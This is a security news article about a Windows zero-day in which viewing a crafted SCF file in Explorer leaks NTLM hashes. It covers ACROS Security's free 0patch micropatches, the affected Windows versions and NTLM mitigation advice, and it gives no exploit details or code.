A newly discovered zero-day vulnerability in Windows allows attackers to remotely harvest NTLM authentication hashes simply by tricking users into viewing malicious files in Windows Explorer.
Security firm ACROS Security has released free unofficial micropatches via its 0patch service to mitigate the flaw until Microsoft issues an official fix.
Vulnerability Details and Exploitation
Dubbed the SCF File NTLM Hash Disclosure Vulnerability, the flaw affects all Windows versions from Windows 7 and Server 2008 R2 to the latest Windows 11 v24H2 and Server 2025.
Attackers can craft a malicious Shell Command File (SCF) that forces a victim’s system to authenticate with an attacker-controlled server when the file is viewed in Explorer even if the user doesn’t open it.
This could occur via shared folders, USB drives, or files auto-downloaded to the Downloads folder.
Stolen NTLM hashes enable pass-the-hash or NTLM relay attacks, where attackers impersonate legitimate users to access sensitive systems.
While Microsoft has deprecated NTLM in favor of Kerberos, the protocol remains widely used, particularly in hybrid environments with legacy systems.
Unofficial Micropatches and Mitigation
0patch’s micropatches address the vulnerability by modifying how Windows handles SCF file icon paths.
The patches apply automatically to registered systems without requiring reboots and will remain free until Microsoft releases an official update.
Affected systems include:
- Legacy Windows versions (e.g., Windows 7, Server 2008 R2) no longer receiving Microsoft updates.
- Modern Windows versions (e.g., Windows 11 v24H2, Server 2025) still under support.
The micropatches join 0patch’s growing library of fixes for unpatched Windows flaws, including the EventLogCrasher vulnerability (which disables event logging across domains) and three “wont-fix” NTLM relay issues: PetitPotam, PrinterBug, and DFSCoerce.
This marks the fourth zero-day 0patch has reported to Microsoft since late 2024, including:
- CVE-2025-21308: A Windows Theme file flaw patched in February 2025.
- CVE-2025-21377: A URL file NTLM leak fixed in February 2025.
- A Mark of the Web bypass on Server 2012, still unpatched.
Despite Microsoft’s progress in retiring NTLM, these vulnerabilities highlight persistent risks in environments using legacy authentication.
0patch reports that 40% of its users rely on the service specifically to mitigate such unpatched or ignored flaws.
Organizations are advised to:
- Apply 0patch micropatches immediately if using unsupported Windows versions.
- Audit internal NTLM usage and transition to Kerberos where possible.
- Monitor for Microsoft’s official patch, expected in future Windows updates.
ACROS Security has withheld technical details to prevent exploitation but confirms the attack methodology mirrors previous NTLM hash leaks via URL files.
Microsoft has not yet provided a timeline for an official fix.
Find this Story Interesting! Follow us on LinkedIn, and X to Get More Instant Updates
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Data Breach at Legends International Exposes Customer Information")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Critical AnythingLLM Vulnerability Enables Remote Code Execution")
